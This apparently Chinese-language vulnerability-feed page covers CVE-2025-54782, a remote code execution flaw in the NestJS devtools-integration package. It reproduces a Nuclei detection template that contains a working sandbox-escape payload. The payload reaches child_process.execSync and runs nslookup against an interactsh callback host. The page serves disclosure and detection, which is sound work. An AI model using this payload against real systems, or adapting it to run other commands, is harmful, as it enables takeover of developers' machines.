NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞信息

漏洞名称: NestJS DevTools Integration Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2025-54782

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: NestJS是一个用于构建高效、可扩展的Node.js服务器端应用程序的框架,广泛应用于企业级服务和Web应用开发中。@nestjs/devtools-integration是其开发工具集成包,用于提供开发时的辅助功能。该包在版本0.2.0及以下存在一个严重的远程代码执行(RCE)漏洞。漏洞的根源在于包暴露了一个本地开发HTTP服务器,其API端点(/inspector/graph/interact)使用了不安全的JavaScript沙箱。由于沙箱的不当实现和缺乏跨源保护,任何恶意网站都可以在访问该网站的开发者本地机器上执行任意代码。这一漏洞的严重性在于它不需要任何形式的认证,且可以被自动化利用,导致攻击者能够完全控制受影响的系统,执行任意命令,进而可能导致数据泄露、服务中断或其他恶意活动。

产品厂商: NestJS

产品名称: @nestjs/devtools-integration

影响版本: <= 0.2.0

来源: https://github.com/projectdiscovery/nuclei-templates/blob/bd5b7315478fba034dd61c29bc4cc8c4c86bccea/http%2Fcves%2F2025%2FCVE-2025-54782.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

id: CVE-2025-54782

info:
  name: NestJS DevTools Integration - Remote Code Execution
  author: SeongHyeonJeon[nukunga]
  severity: critical
  description: |
    The @nestjs/devtools-integration package <= 0.2.0 is vulnerable to a Remote Code Execution (RCE) vulnerability.
    The package exposes a local development HTTP server with an API endpoint (/inspector/graph/interact) that uses an unsafe JavaScript sandbox.
    Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.
  reference:
    - https://socket.dev/blog/nestjs-rce-vuln
    - https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
    - https://nvd.nist.gov/vuln/detail/CVE-2025-54782
  classification:
    cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 9.4
    cve-id: CVE-2025-54782
    cwe-id: CWE-77, CWE-352, CWE-78
  tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth

http:
  - method: POST
    path:
      - "{{BaseURL}}/inspector/graph/interact"
    headers:
      Content-Type: "text/plain"
    body: |
      {"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
      - type: status
        status:
          - 200

Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
NestJS DevTools Integration Remote Code Execution Vulnerability
http://example.com/2025/08/03/github_2709797173/
作者
lianccc
发布于
2025年8月3日
许可协议